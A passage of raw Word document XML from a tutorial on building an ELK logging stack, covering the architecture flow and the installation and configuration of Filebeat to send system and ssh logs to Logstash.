        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C482DD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>We’ll set up and configure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DD1B45" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> – for system &amp; application logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6C0EBE" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> – for Windows Event Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7E5F6C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Optional later)</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Packetbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Auditbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> – for network &amp; security data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411F8841" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="35F80D0A">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BAED2B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🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.1 Understanding the Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B29765F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AED5C7" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>(Endpoints / Servers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C2721" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A86164C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> (collect logs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15123E73" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F27746" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD6ACCB" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t>Logstash  →  Elasticsearch  →  Kibana (visualize)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AFC508" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Beats run on each machine → collect logs → send to Logstash on your ELK VM → Logstash pipelines parse → Elasticsearch indexes → Kibana dashboards display.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2326A338" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="08190B5B">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C50509F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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.2 Install and Configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50319CDB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📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 1: Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A5B6723" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Run on the machine you want to monitor (can be same as ELK VM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F905A92" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"># Download &amp; install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FEF5700" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>curl -L -O https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-8.15.0-amd64.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE96B2D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>dpkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> filebeat-8.15.0-amd64.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C15E77" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📘</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Docs: </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:tgtFrame="_new" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Filebeat</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Install Guide (Linux)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0951A8CA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="43D569EA">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC511A5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📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 2: Configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F42ACA0" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Open config file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE54D1E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> nano /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36CC4D51" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Search for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>output</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> section.</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
        <w:t xml:space="preserve">By default, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> sends directly to Elasticsearch — but we’ll send to </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logstash</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> (so we can parse and filter later).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BEF8F6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🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Modify this section:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7761DBB7" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># Disable Elasticsearch output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00370055" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>output.elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914724D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>#   hosts: ["localhost:9200"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0071E160" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538"/>
    <w:p w14:paraId="2BDFC2DE" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># Enable Logstash output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424391D2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>output.logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353DFC18" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  hosts: ["&lt;ELK_VM_IP&gt;:5044"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FCFBF0" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Make sure port 5044 is open and reachable from this machine.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7559EA25" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="6D4D1743">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="157883FB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📦</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 3: Enable default modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6BF572" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">These modules collect logs from common services (system, ssh, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B3F846" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> modules enable system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E485173" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> modules enable ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57696F35" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t>To list all available modules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DC3A92" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> modules list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BF9F3F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">You can enable others later like nginx, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>auditd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334D142C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="41825CB3">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0BB620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📊</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 4: Test Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F56B0CE" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> test config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC9BE1A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> test output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358EE19C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>You should see something like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4571E262" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>: &lt;ELK_VM_IP&gt;:5044...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0692BB" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>connection...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4037F490" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAE0FFB" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="412B2681">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A7D797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▶️</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 5: Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="170699AB" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7341F87B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44E66BD6" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> status </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56C3D2F9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Now </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> will start sending system logs to Logstash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31817951" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="2F70F6C9">
